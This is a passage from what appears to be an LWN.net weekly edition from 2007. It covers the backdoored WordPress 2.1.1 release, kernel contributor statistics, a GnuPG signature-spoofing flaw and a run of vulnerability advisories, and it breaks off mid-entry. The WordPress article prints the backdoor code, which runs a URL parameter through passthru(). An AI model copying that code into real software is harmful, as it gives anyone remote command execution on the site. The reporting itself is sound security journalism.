The backdooring of WordPress
WordPress is, according to its web
site, "
a state-of-the-art semantic personal publishing platform with
a focus on aesthetics, web standards, and usability." In other
words, it is yet another weblog platform written in PHP. Like many such
platforms, it has a fairly long history of security issues. Even so, the
code samples featured in
this ifsecure
advisory are on the extreme side. One example:
function get_theme_mcommand($mcds) {
passthru($mcds);
}
/* ... */
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
Needless to say, code like this is not a programming error - it is a
deliberate backdoor. The project responded quickly, replacing the
compromised 2.1.1 release with a fixed 2.1.2 and sending out an
advisory. Even so, there are probably sites which installed the 2.1.1
release (which appears to have been distributed with the backdoor for about
one week) and which are still vulnerable.
It would be nice if the project would make a little more information
available. As others have noted, there are no checksums of good or
compromised versions of the software. We also know nothing about how the
code was compromised in the first place, beyond this:
It was determined that a cracker had gained user-level access to
one of the servers that powers wordpress.org, and had used that
access to modify the download file.
Inquiring minds want to know how this could have come about; is there a
separate WordPress vulnerability which still needs to be fixed? What steps
have been taken to ensure that this sort of security breach cannot happen
to future WordPress releases? The insertion of backdoors into services
which are directly exposed to the Internet is a scary business; anybody who
is running WordPress should be asking the project some serious questions to
convince themselves that they will not have to go through this again. Your
editor searched in vain for any such discussion in the WordPress forums.
In one sense, WordPress users can consider themselves lucky: the code
implementing the backdoor was so crude that it had little chance of
escaping detection for long. Had the backdoor code been more subtle, it
could well have survived for much longer. One assumes that the WordPress
developers are auditing their code, looking for holes inserted with more
care. But if they are, they are not talking about it.
In general, backdoors are a frightening prospect for free software
developers to ponder. The relatively open nature of many projects must
provide a tempting target for scheming crackers, and it is not that hard to
imagine that a good-enough developer could manage to code a backdoor in a
sufficiently obscure manner that it gets through the review process without
being detected. There may well be a project distributing such code now.
That said, a quick look at the (relatively thin) history of compromised
free software distributions shows that the normal contribution process is
not the preferred way to insert backdoors. Instead, crackers seem to focus
on breaking into servers and modifying code there. We can count ourselves
fortunate; such attacks are easier to detect and recover from.
The real lesson from this episode, as from the ones that came before, is
that there is a real incentive for crackers to insert malware into free
software distributions. (Clearly, the same incentive exists for
proprietary software, but that does not concern us here). Any project
which is distributing code with any security considerations at all (and
that is most code) needs to think about this threat. If your processes -
or your servers - are vulnerable to attack, it may be your project which
finds its way into the headlines for the wrong reasons.
Comments (5 posted)
Who's writing 2.6.21 and related issues
Our article
Who wrote
2.6.20?, which appeared two weeks ago, generated a strong response.
There is, it seems, a lot of interest in where this code is coming from,
but nobody had gotten around to doing the crunching to figure it out. That
article calls for a followup in a few ways.
First, those who saw the article early on may want to take another look, as
some of the tables have been changed. There was only one serious mistake
to fix - one developer's affiliation was incorrectly guessed by the code -
but further information has also helped to shrink the "unknown" column
somewhat. The original tables can be found from the article (for whatever
historical reasons may exist), but the tables in the article itself are the
current ones.
The 2.6.21 cycle has moved far enough along as of this writing (the
2.6.21-rc3 prepatch is due any time) that it's worth taking a look
at the statistics for the just over 4,000 changesets which have been
merged. There are some familiar names here, but some new ones as well.
The reflect the different nature of this development cycle, 2.6.21 will
have fewer changes in the virtualization area, for example, but it has some
significant core changes (like the clockevents and dynamic tick
work). A somewhat different set of developers had work ready to merge this
time around, and the results show that.
Anyway, the developers with the most work merged this time around are:
| Most active 2.6.21 developers |
| By changesets | |
By lines changed |
| Eric W. Biederman | 104 | 2.5% |
|
Adrian Bunk | 24097 | 6.1% |
| Ralf Baechle | 77 | 1.9% |
|
Divy Le Ray | 18255 | 4.6% |
| Adrian Bunk | 71 | 1.7% |
|
Ben Dooks | 17510 | 4.4% |
| Bob Moore | 66 | 1.6% |
|
Andrew Victor | 13877 | 3.5% |
| Andrew Morton | 54 | 1.3% |
|
Ralf Baechle | 9905 | 2.5% |
| Takashi Iwai | 54 | 1.3% |
|
YOSHIFUJI Hideaki | 9505 | 2.4% |
| Robert P. J. Day | 53 | 1.3% |
|
Steve Wise | 9418 | 2.4% |
| Jeff Dike | 52 | 1.3% |
|
Jeff Garzik | 7014 | 1.8% |
| Jiri Slaby | 51 | 1.2% |
|
Vitaly Bordug | 6387 | 1.6% |
| Ben Dooks | 50 | 1.2% |
|
Thomas Gleixner | 6078 | 1.5% |
| Tejun Heo | 48 | 1.2% |
|
Bob Moore | 6055 | 1.5% |
| Al Viro | 48 | 1.2% |
|
Ishizaki Kou | 5912 | 1.5% |
| David Brownell | 47 | 1.1% |
|
Richard Purdie | 5909 | 1.5% |
| YOSHIFUJI Hideaki | 44 | 1.1% |
|
Liam Girdwood | 5773 | 1.5% |
| Mike Isely | 43 | 1.1% |
|
Frank Mandarino | 5284 | 1.3% |
| Thomas Gleixner | 38 | 0.9% |
|
Jay Cliburn | 5182 | 1.3% |
| Randy Dunlap | 38 | 0.9% |
|
Tejun Heo | 5120 | 1.3% |
| Stephen Hemminger | 36 | 0.9% |
|
Kumar Gala | 5044 | 1.3% |
| Alan Cox | 35 | 0.9% |
|
Martin Schwidefsky | 4729 | 1.2% |
| Michael Krufky | 32 | 0.8% |
|
Olof Johansson | 4659 | 1.2% |
On the side of removing code, the list of names remains about the same:
| Developers with the most lines removed |
| Adrian Bunk | 23720 | 12.8% |
| Jeff Garzik | 6808 | 3.7% |
| Paul Mundt | 2442 | 1.3% |
| Bob Moore | 1526 | 0.8% |
| Len Brown | 1244 | 0.7% |
| Alexey Starikovskiy | 987 | 0.5% |
| Jiri Slaby | 954 | 0.5% |
| Kenji Kaneshige | 661 | 0.4% |
| Eric Sandeen | 609 | 0.3% |
| Tim Schmielau | 547 | 0.3% |
Adrian Bunk continues to remove code from the kernel at an amazing rate.
Also about the same is the table of signoffs:
| Developers with the most signoffs (total 8614) |
| Andrew Morton | 1000 | 11.6% |
| Linus Torvalds | 865 | 10.0% |
| Jeff Garzik | 346 | 4.0% |
| Jaroslav Kysela | 224 | 2.6% |
| Greg Kroah-Hartman | 224 | 2.6% |
| David Miller | 208 | 2.4% |
| Mauro Carvalho Chehab | 206 | 2.4% |
| Len Brown | 202 | 2.3% |
| Takashi Iwai | 187 | 2.2% |
| Ralf Baechle | 156 | 1.8% |
| Russell King | 153 | 1.8% |
| Paul Mackerras | 151 | 1.8% |
| James Bottomley | 114 | 1.3% |
| Eric W. Biederman | 105 | 1.2% |
| Adrian Bunk | 99 | 1.1% |
| Andi Kleen | 94 | 1.1% |
| Alexey Starikovskiy | 82 | 1.0% |
| Kyle McMartin | 79 | 0.9% |
| David Brownell | 78 | 0.9% |
| Ingo Molnar | 68 | 0.8% |
The list of developers contributing code to a given kernel release can
change over time, but the people through whom those patches pass - the
subsystem maintainers - remain about the same. These developers form the
infrastructure which does the work of getting reviewed code into the
mainline kernel.
Here's the by-employer tables for 2.6.21-rc:
| Top contributors by employer |
| By changesets |
|
By lines changed |
| (Unknown) | 1108 | 27.1% |
|
(Unknown) | 85436 | 21.5% |
| (None) | 380 | 9.3% |
|
(None) | 52312 | 13.2% |
| Red Hat | 304 | 7.4% |
|
IBM | 28186 | 7.1% |
| Intel | 280 | 6.8% |
|
Intel | 20778 | 5.2% |
| IBM | 259 | 6.3% |
|
Red Hat | 19007 | 4.8% |
| Novell | 258 | 6.3% |
|
Novell | 18702 | 4.7% |
| Linux Foundation | 159 | 3.9% |
|
Chelsio | 18361 | 4.6% |
| Linux Networx | 104 | 2.5% |
|
Simtec | 17545 | 4.4% |
| (Consultant) | 100 | 2.4% |
|
SANPeople | 13949 | 3.5% |
| Oracle | 89 | 2.2% |
|
MIPS Technologies | 12646 | 3.2% |
| MIPS Technologies | 77 | 1.9% |
|
Open Grid Computing | 9442 | 2.4% |
| Google | 61 | 1.5% |
|
MontaVista | 8861 | 2.2% |
| MontaVista | 55 | 1.3% |
|
Toshiba | 7462 | 1.9% |
| SGI | 54 | 1.3% |
|
Wolfson Microelectronics | 7379 | 1.9% |
| Simtec | 50 | 1.2% |
|
Sony | 7061 | 1.8% |
| Nokia | 41 | 1.0% |
|
Freescale | 6993 | 1.8% |
| TimeSys | 38 | 0.9% |
|
TimeSys | 6184 | 1.6% |
| Sony | 36 | 0.9% |
|
Endrelia | 5421 | 1.4% |
| HP | 35 | 0.9% |
|
Nokia | 4790 | 1.2% |
| Toshiba | 34 | 0.8% |
|
Renesas Technology | 4740 | 1.2% |
Many of the names are the same, but Red Hat does not dominate to quite the
same extent as in 2.6.20. The percentage of patches contributed by
developers known to be working on their own time has increased slightly.
Finally, some commenters on the original article requested the release of
the code used to generate the numbers. Your editor has some qualms about
doing so. The biggest among them is not that the code is an
embarrassing hack with, presumably, at least one bug still in it. Neither
is it the fact that the code could be seen as a competitive tool for LWN;
frankly, there's nothing that complicated there.
The biggest worry is related to the attention these numbers drew, and the
fact that a couple of developers have mailed in to note that they have
received job offers as a result of appearing in the LWN lists. In
addition, a few employers have contacted us to be sure that their
"account" is credited with the work of all of their employees. The
numbers your editor has generated are approximations, but some people
clearly see them as being important.
The editors
at LWN have an interest in covering the free software community while
minimizing the changes that such coverage might cause - most of the time,
at least. It seems plausible that, if the "top 20 contributors list" is
seen as a desirable place
to appear - with positive career benefits - developers might change their
behavior as a result. It would be a shame to start seeing kernel patches
aimed mainly at increasing a developer's count of lines changed. Such
patches, one assumes, would not fare well in the review process, but it
would be better if the situation did not come up at all.
The issue of the mapping between developers and their employers is also
worth some consideration. Some of that information was obtained directly
from the developers with a promise not to disclose it further; that promise
must be kept. Beyond that, developers tend to change employers over time,
and the code is not currently smart enough to deal with that. This
shortcoming is not a problem when looking at a single release cycle, but it
clearly would be an issue for multi-year analysis. The code could be
improved, but it's not at all clear that the maintenance and distribution of a
database of kernel developers' work histories is something LWN wants to get
into. There are serious privacy issues to consider.
Despite these worries, the code is being released. In the end, it's not as
if somebody else would have all that much trouble reproducing it. Some of
the employer information has been taken out in response to the concerns outlined
above, though. A tarball of the initial release can be found here;
your editor is looking forward to the flood of patches which will improve
the system.
Comments (15 posted)
Page editor: Jonathan Corbet
Security
GnuPG signed message spoofing vulnerability
March 7, 2007
This article was contributed by Jake Edge.
An advisory about a problem
in GNU Privacy Guard (GnuPG) would normally cause worries about an
implementation flaw leading to insecurely encrypted data. Thankfully, this
particular vulnerability does not fall into that category and data encrypted
using GnuPG is not at risk from it; it is, instead, a hole which allows
attackers to spoof signatures.
This vulnerability highlights an interesting
interaction between GnuPG and the applications that use it. The flaw is not
so much in how GnuPG does its work, rather it is in how it presents it.
GnuPG is an implementation of the OpenPGP
standard which governs messages encrypted with public-key encryption.
The standard is described in
RFC 2440 and is descended
from the original
Pretty
Good Privacy (PGP) program that Phil Zimmerman released (much to the
chagrin of the US Government) in 1991. Many different mail programs use
GnuPG (or the related
GnuPG Made Easy
(GPGME) library) to handle encrypted email;
these programs include most open source
email clients (KMail, Evolution, Thunderbird via the EnigMail plugin, mutt,
etc.). All are vulnerable to the spoof - as is the gpg command-line
tool, depending on how it is used.
One of the features of OpenPGP is digital signing of
messages so that the recipient can ensure that the message they
receive is the same as the one that was sent. It is this digital
signature that is vulnerable to this attack as it can be spoofed; making it
appear that unsigned text is covered by a valid signature. An attacker
can insert malicious text into an existing message and have it appear
to have been sent by the signer.
OpenPGP messages consist of a set of "packets" that correspond to different
sections of a message (plaintext, encrypted, signature, compressed,
ascii-armored, etc). Taking two valid OpenPGP messages and concatenating
them produces a longer, but still valid, OpenPGP message. The simplest
way to exploit the flaw is to take a plaintext packet and add it to the
front of a signed plaintext packet. If the user attempts to verify
the message by invoking gpg < msgfile, they will see the contents
of both of the plaintext packets followed by a statement that the
signature was verified. Nothing in the output indicates the presence of
two packets with different signature status.
If this were the only issue, there would be a relatively easy, but not
completely satisfying, workaround; do not redirect stdin from a
file when using gpg. When
it is invoked as gpg msgfile, GnuPG writes each individual plaintext
packet into a separate file and, depending on the filenames specified in
the packet, the above example would either create two
files or prompt asking whether to overwrite when it encounters
the second packet. That prompt, or the presence of two files, might be
enough to alert the observant user to an anomaly, but is hardly foolproof.
Unfortunately, mail clients typically invoke gpg via the output
end of a pipe which allows them to be spoofed.
GnuPG does provide the --status-fd mode to prevent just this kind of
attack by producing more status information on the specified file descriptor.
The status information is not particularly user-friendly and might not
alert a casual user to the spoof, but it certainly can be used by a program
to detect the spoof. This is how GnuPG recommends that it be used by other
programs but the developers of many mail clients ignored that advice with
the result that their code is vulnerable.
Normally this might be considered a problem for the mail
client developers to solve, but the GnuPG team decided to make changes to
GnuPG and GPGME to alleviate the problem.
Updated versions of GnuPG will no longer process multiple messages in a
single invocation, avoiding the mingling of packets with
different signature status. GPGME has been changed to avoid the spoofing
even when it is using a vulnerable version of GnuPG. It is likely that the
various mail clients will need to be updated eventually as well because
they may well rely on GnuPG to process multiple messages in a single pass.
The mail clients may not correctly process all of the email types that they
did in the past, but they will not be vulnerable to this kind of attack.
The advisory has a wealth of information about the flaw and various ways that
it can be exploited; it is well worth a read for those interested. This is
an interesting bug because it lives between the GnuPG software and its
users (both human and program). The GnuPG developers could have pushed this
off as a problem for those users, but took a more helpful approach. If the
command-line version (gpg < msgfile) of the flaw did not exist,
it seems possible that they would have chosen differently and the mail client
development teams would instead be scrambling to release updates.
Comments (13 posted)
Security news
The Month of PHP Bugs
The Month of PHP Bugs (March)
has been announced.
"
This initiative is an effort to improve the security of PHP. However we will not concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core. During March 2007 old and new security vulnerabilities in the Zend Engine, the PHP core and the PHP extensions will be disclosed on a day by day basis. We will also point out necessary changes in the current vulnerability manag[e]ment process used by the PHP Security Response Team."
Comments (1 posted)
New vulnerabilities
GnuPG: unsigned data injection vulnerability
| Package(s): | gnupg |
CVE #(s): | CVE-2007-1263
|
| Created: | March 6, 2007 |
Updated: | March 30, 2007 |
| Description: |
Core Security Technologies has reported
that GnuPG and GnuPG clients are vulnerable to an unsigned data injection
vulnerability. |
| Alerts: |
|
Comments (none posted)
mod_jk: stack overflow
| Package(s): | mod_jk |
CVE #(s): | CVE-2007-0774
|
| Created: | March 5, 2007 |
Updated: | May 30, 2007 |
| Description: |
A stack overflow flaw was found in the URI handler of mod_jk. A remote
attacker could visit a carefully crafted URL being handled by mod_jk and
trigger this flaw, which could lead to the execution of arbitrary code as the
'apache' user. |
| Alerts: |
|
Comments (none posted)
mod_python: information disclosure
| Package(s): | libapache2-mod-python |
CVE #(s): | CVE-2004-2680
|
| Created: | March 7, 2007 |
Updated: | March 8, 2007 |
| Description: |
From the Ubuntu advisory: Miles Egan discovered that mod_python, when used in output filter mode,
did not handle output larger than 16384 bytes, and would display freed
memory, possibly disclosing private data. |
| Alerts: |
|
Comments (none posted)
snort: remote arbitrary code execution
| Package(s): | snort |
CVE #(s): | CVE-2006-5276
|
| Created: | March 2, 2007 |
Updated: | September 7, 2007 |
| Description: |
The Snort intrusion detection system is vulnerable to a buffer overflow
in the DCE/RPC preprocessor code. Remote attackers can send
specially crafted fragmented SMB or DCE/RPC packets which can be used
to allow the the remote execution of arbitrary code. |
| Alerts: |
|
Comments (1 posted)
STLport: buffer overflows
| Package(s): | STLport |
CVE #(s): | CVE-2007-0803
|
| Created: | March 7, 2007 |
Updated: | March 7, 2007 |
| Description: |
STLport (prior to version 5.0.3) suffers from two remotely exploitable buffer overflows. |
| Alerts: |
|
Comments (none posted)
tcpdump: denial of service
| Package(s): | tcpdump |
CVE #(s): | CVE-2007-1218
|
| Created: | March 5, 2007 |
Updated: | November 15, 2007 |
| Description: |
Off-by-one buffer overflow in the parse_elements function in the 802.11
printer code (print-802_11.c) for tcpdump 3.9.5 and earlier allows remote
attackers to cause a denial of service (crash) via a crafted 802.11
frame. NOTE: this was originally referred to as heap-based, but it might be
stack-based. |
| Alerts: |
|
Comments (none posted)
util-linux: information disclosure
| Package(s): | util-linux |
CVE #(s): | CVE-2007-0822
|
| Created: | March 7, 2007 |
Updated: | March 7, 2007 |
| Description: |
Users can confuse util-linux by way of removable drives, leading to crashes and the possibility of information disclosure via the resulting core dumps. |
| Alerts: |
|
Comments (1 posted)
wordpress: cross-site scripting
| Package(s): | wordpress |
CVE #(s): | CVE-2007-1049
|
| Created: | March 5, 2007 |
Updated: | March 21, 2007 |
| Description: |
A Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in
the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0
before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary
web script or HTML via the file parameter to wp-admin/templates.php, and
possibly other vectors involving the action variable. |
| Alerts: |
|
Comments (none posted)
Updated vulnerabilities
apache: cross-site scripting
| Package(s): | apache |
CVE #(s): | CVE-2006-3918
|
| Created: | August 9, 2006 |
Updated: | April 4, 2008 |
| Description: |
From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server
was returned to the user in an unescaped error message. This could
allow an attacker to perform a cross-site scripting attack if a victim was
tricked into connecting to a site and sending a carefully crafted Expect
header." |
| Alerts: |
|
Comments (none posted)
bind: denial of service
| Package(s): | bind |
CVE #(s): | CVE-2007-0493
CVE-2007-0494
|
| Created: | January 26, 2007 |
Updated: | March 14, 2007 |
| Description: |
The bind package is vulnerable to two remote denial of service attacks in
which attackers can cause the bind daemon to to crash or exit unexpectedly
by providing malformed data to the daemon in a DNS request. |
| Alerts: |
|
Comments (none posted)
bluez-utils: hidd vulnerability
| Package(s): | bluez-utils |
CVE #(s): | CVE-2006-6899
|
| Created: | January 16, 2007 |
Updated: | May 14, 2007 |
| Description: |
hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to obtain
control of the Mouse and Keyboard Human Interface Device (HID) via a
certain configuration of two HID (PSM) endpoints, operating as a server,
aka HidAttack. |
| Alerts: |
|
Comments (none posted)
bugzilla: multiple vulnerabilities
| Package(s): | bugzilla |
CVE #(s): | CVE-2006-5453
CVE-2006-5454
CVE-2006-5455
|
| Created: | November 10, 2006 |
Updated: | August 28, 2007 |
| Description: |
Bugzilla has the following vulnerabilities:
Input data passed to various fields is not properly sanitized before
being passed back to users.
Users can gain unauthorized access to read attachment
descriptions while using diff mode.
HTTP GET and HTTP POST requests can be used to perform unauthorized
actions due to improper verification.
Input that is passed to showdependencygraph.cgi is not properly
sanitized before being returned to users. |
| Alerts: |
|
Comments (none posted)
busybox: insecure password generation
| Package(s): | busybox |
CVE #(s): | CVE-2006-1058
|
| Created: | May 5, 2006 |
Updated: | May 2, 2007 |
| Description: |
The BusyBox 1.1.1 passwd command does not use a proper salt when generating
passwords. This would create an instance where a brute force attack could
take very little time. |
| Alerts: |
|
Comments (2 posted)
chmlib: remote execution of arbitrary code
| Package(s): | chmlib |
CVE #(s): | CVE-2007-0619
|
| Created: | February 27, 2007 |
Updated: | February 28, 2007 |
| Description: |
When certain CHM files that contain tables and objects stored in pages are
parsed by CHMlib, an unsanitized value is passed to the alloca() function
resulting in a shift of the stack pointer to arbitrary memory locations.
An attacker could entice a user to open a specially crafted CHM file,
resulting in the execution of arbitrary code with the permissions of the
user viewing the file. |
| Alerts: |
|
Comments (none posted)
clamav: directory traversal, denial of service
| Package(s): | clamav |
CVE #(s): | CVE-2007-0897
CVE-2007-0898
|
| Created: | February 20, 2007 |
Updated: | March 7, 2007 |
| Description: |
Clam AntiVirus ClamAV before 0.90 does not close open file descriptors
under certain conditions, which allows remote attackers to cause a denial
of service (file descriptor consumption and failed scans) via CAB archives
with a cabinet header record length of zero, which causes a function to
return without closing a file descriptor. (CVE-2007-0897)
Directory traversal vulnerability in clamd in Clam AntiVirus ClamAV before
0.90 allows remote attackers to overwrite arbitrary files via a .. (dot
dot) in the id MIME header parameter in a multi-part
message. (CVE-2007-0898) |
| Alerts: |
|
Comments (none posted)
cpio: arbitrary code execution
| Package(s): | cpio |
CVE #(s): | CVE-2005-4268
|
| Created: | January 2, 2006 |
Updated: | May 8, 2007 |
| Description: |
Richard Harms discovered that cpio did not sufficiently validate file
properties when creating archives. Files with e. g. a very large size
caused a buffer overflow. By tricking a user or an automatic backup
system into putting a specially crafted file into a cpio archive, a
local attacker could probably exploit this to execute arbitrary code
with the privileges of the target user (which is likely root in an
automatic backup system). |
| Alerts: |
|
Comments (none posted)
Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service
| Package(s): | cyrus-sasl |
CVE #(s): | CVE-2006-1721
|
| Created: | April 21, 2006 |
Updated: | September 4, 2007 |
| Description: |
Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5
process that could lead to a Denial of Service. An attacker could possibly
exploit this vulnerability by sending specially crafted data stream to the
Cyrus-SASL server, resulting in a Denial of Service even if the attacker is
not able to authenticate. |
| Alerts: |
|
Comments (none posted)
dovecot: index cache file handling error
| Package(s): | dovecot |
CVE #(s): | CVE-2006-5973
|
| Created: | November 29, 2006 |
Updated: | May 8, 2007 |
| Description: |
The dovecot IMAP server has an error in its index cache file handling code which could be exploited by an authenticated user to execute arbitrary code. Only servers with the (non-default) mmap_disable=yes option setting are vulnerable. |
| Alerts: |
|
Comments (none posted)
ekiga: format string vulnerability
| Package(s): | ekiga |
CVE #(s): | CVE-2007-1006
CVE-2007-0999
|
| Created: | February 21, 2007 |
Updated: | March 30, 2007 |
| Description: |
Ekiga contains a format string vulnerability in the code which processes
control messages from remote peers.
If a user was running Ekiga and listening for incoming calls, a remote
attacker could send a crafted call request, and execute arbitrary code with
the user's privileges. |
| Alerts: |
|
Comments (none posted)
enigmail: memory allocation errors
| Package(s): | enigmail |
CVE #(s): | CVE-2006-5877
|
| Created: | February 23, 2007 |
Updated: | February 28, 2007 |
| Description: |
Mikhail Markin reported that enigmail incorrectly handled memory
allocations for certain large encrypted attachments. This caused
Thunderbird to crash and thus caused the entire message to be
inaccessible. |
| Alerts: |
|
Comments (none posted)
fail2ban: denial of service
| Package(s): | fail2ban |
CVE #(s): | CVE-2006-6302
|
| Created: | February 16, 2007 |
Updated: | July 30, 2007 |
| Description: |
fail2ban 0.7.4 and earlier does not properly parse sshd logs file, which
allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file
and cause a denial of service by adding arbitrary IP addresses to the sshd
log file, as demonstrated by logging in to ssh using a login name
containing certain strings with an IP address. |
| Alerts: |
|
Comments (3 posted)
fetchmail: password disclosure and DOS
| Package(s): | fetchmail |
CVE #(s): | CVE-2006-5867
CVE-2006-5974
|
| Created: | January 9, 2007 |
Updated: | March 16, 2007 |
| Description: |
Fetchmail suffers from a password disclosure vulnerability due to a failure to use secure protocols (advisory) and a denial of service vulnerability (advisory). |
| Alerts: |
|
Comments (none posted)
ffmpeg: buffer overflows
| Package(s): | ffmpeg |
CVE #(s): | CVE-2006-4799
CVE-2006-4800
|
| Created: | September 14, 2006 |
Updated: | May 28, 2007 |
| Description: |
the AVI processing code in FFmpeg has a number of buffer overflow
vulnerabilities.
If an attacker can trick a user into loading a specially crafted
crafted AVI, arbitrary code can be executed with the user's privileges. |
| Alerts: |
|
Comments (2 posted)
Mozilla stuff: multiple vulnerabilities
Comments (none posted)
freeradius: several vulnerabilities
| Package(s): | freeradius |
CVE #(s): | CVE-2005-4745
CVE-2005-4746
|
| Created: | August 8, 2006 |
Updated: | April 24, 2007 |
| Description: |
Several remote vulnerabilities have been discovered in freeradius, a
high-performance RADIUS server, which may lead to SQL injection or denial
of service. |
| Alerts: |
|
Comments (none posted)
freetype: integer overflows
| Package(s): | freetype |
CVE #(s): | CVE-2006-0747
CVE-2006-1861
CVE-2006-2493
CVE-2006-2661
CVE-2006-3467
|
| Created: | June 8, 2006 |
Updated: | October 10, 2007 |
| Description: |
The FreeType library has several integer overflow vulnerabilities.
If a user can be tricked into installing a specially
crafted font file, arbitrary code can be executed with the privilege
of the user. |
| Alerts: |
|
Comments (none posted)
gcc: file overwrite vulnerability
| Package(s): | gcc |
CVE #(s): | CVE-2006-3619
|
| Created: | September 6, 2006 |
Updated: | March 14, 2008 |
| Description: |
The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree. |
| Alerts: |
|
Comments (none posted)
gd: buffer overflow
| Package(s): | gd |
CVE #(s): | CVE-2007-0455
|
| Created: | February 7, 2007 |
Updated: | February 28, 2008 |
| Description: |
The gd graphics library contains a buffer overflow which could enable a remote attacker to execute arbitrary code. Note that various other packages include code from gd and could also be vulnerable. |
| Alerts: |
|
Comments (2 posted)
gdb: buffer overflow
| Package(s): | gdb |
CVE #(s): | CVE-2006-4146
|
| Created: | September 15, 2006 |
Updated: | June 12, 2007 |
| Description: |
A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU
Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to
execute arbitrary code via a crafted file with a location block
(DW_FORM_block) that contains a large number of operations. |
| Alerts: |
|
Comments (none posted)
gdm: improper file permissions
| Package(s): | gdm |
CVE #(s): | CVE-2006-1057
|
| Created: | April 19, 2006 |
Updated: | May 2, 2007 |
| Description: |
The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem. |
| Alerts: |
|
Comments (none posted)
gnomemeeting: format string flaw
| Package(s): | gnomemeeting |
CVE #(s): | CVE-2007-1007
|
| Created: | February 20, 2007 |
Updated: | March 5, 2007 |
| Description: |
A format string flaw was found in the way GnomeMeeting processes certain
messages. If a user is running GnomeMeeting, a remote attacker who can
connect to GnomeMeeting could trigger this flaw and potentially execute
arbitrary code with the privileges of the user. |
| Alerts: |
|
Comments (none posted)
gnupg: stack overwrite
| Package(s): | gnupg |
CVE #(s): | CVE-2006-6235
|
| Created: | December 12, 2006 |
Updated: | March 13, 2007 |
| Description: |
A "stack overwrite" vulnerability in GnuPG (gpg) allows attackers to
execute arbitrary code via crafted OpenPGP packets that cause GnuPG to
dereference a function pointer from deallocated stack memory. |
| Alerts: |
|
Comments (3 posted)
gv: stack-based buffer overflow
| Package(s): | gv |
CVE #(s): | CVE-2006-5864
|
| Created: | November 20, 2006 |
Updated: | April 9, 2007 |
| Description: |
Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv
3.6.2, and possibly earlier versions, allows user-assisted attackers to
execute arbitrary code via a PostScript (PS) file with certain headers that
contain long comments, as demonstrated using the DocumentMedia header. |
| Alerts: |
|
Comments (none posted)
gzip: multiple vulnerabilities
| Package(s): | gzip |
CVE #(s): | CVE-2006-4334
CVE-2006-4335
CVE-2006-4336
CVE-2006-4337
CVE-2006-4338
|
| Created: | September 19, 2006 |
Updated: | June 1, 2007 |
| Description: |
Tavis Ormandy of the Google Security Team discovered two denial of service
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to hang or
crash.
Tavis Ormandy of the Google Security Team discovered several code execution
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to crash or
execute arbitrary code. |
| Alerts: |
|
Comments (1 posted)
horde-kronolith: local file inclusion
| Package(s): | horde-kronolith |
CVE #(s): | CVE-2006-6175
|
| Created: | January 17, 2007 |
Updated: | March 7, 2008 |
| Description: |
Kronolith contains a mistake in lib/FBView.php where a raw, unfiltered
string is used instead of a sanitized string to view local files. An
authenticated attacker could craft an HTTP GET request that uses directory
traversal techniques to execute any file on the web server as PHP code,
which could allow information disclosure or arbitrary code execution with
the rights of the user running the PHP application (usually the webserver
user). |
| Alerts: |
|
Comments (none posted)
ImageMagick: buffer overflows
| Package(s): | ImageMagick |
CVE #(s): | CVE-2006-5456
|
| Created: | October 31, 2006 |
Updated: | March 8, 2007 |
| Description: |
Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick
6.0.7 allow user-assisted attackers to cause a denial of service and
possibly execute execute arbitrary code via (1) a DCM image that is not
properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a
PALM image that is not properly handled by the ReadPALMImage function in
coders/palm.c. |
| Alerts: |
|
Comments (2 posted)
imlib2: arbitrary code execution
| Package(s): | imlib2 |
CVE #(s): | CVE-2006-4806
CVE-2006-4807
CVE-2006-4808
CVE-2006-4809
|
| Created: | November 6, 2006 |
Updated: | August 13, 2007 |
| Description: |
M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the
validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user
were tricked into viewing or processing a specially crafted image with
an application that uses imlib2, the flaws could be exploited to execute
arbitrary code with the user's privileges. |
| Alerts: |
|
Comments (none posted)
java: multiple vulnerabilities
| Package(s): | java |
CVE #(s): | CVE-2006-4339
CVE-2006-4790
CVE-2006-6731
CVE-2006-6736
CVE-2006-6737
CVE-2006-6745
|
| Created: | January 18, 2007 |
Updated: | June 8, 2007 |
| Description: |
java has multiple vulnerabilities, these include:
an RSA exponent padding attack vulnerability, two vulnerabilities
which allow untrusted applets to access data in other applets,
vulnerabilities that involve applets gaining privileges due to
serialization bugs in the JRE and buffer overflows in the java image
handling routines that can give attackers read/write/execute capabilities
for local files. |
| Alerts: |
|
Comments (1 posted)
kdelibs: integer overflow
| Package(s): | kdelibs |
CVE #(s): | CVE-2006-4811
|
| Created: | October 18, 2006 |
Updated: | March 5, 2007 |
| Description: |
The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code. |
| Alerts: |
|
Comments (none posted)
kdelibs: cross-site scripting
| Package(s): | kdelibs konqeror |
CVE #(s): | CVE-2007-0537
|
| Created: | February 5, 2007 |
Updated: | August 13, 2007 |
| Description: |
Konqueror 3.5.5 does not properly parse HTML comments, which allows remote
attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS
protection schemes by embedding certain HTML tags within a comment, a
related issue to CVE-2007-0478. |
| Alerts: |
|
Comments (none posted)
kernel: multiple vulnerabilities
| Package(s): | kernel |
CVE #(s): | CVE-2006-5749
CVE-2006-4814
CVE-2006-6106
|
| Created: | January 5, 2007 |
Updated: | May 7, 2008 |
| Description: |
A security issue has been reported in Linux kernel due to an error in
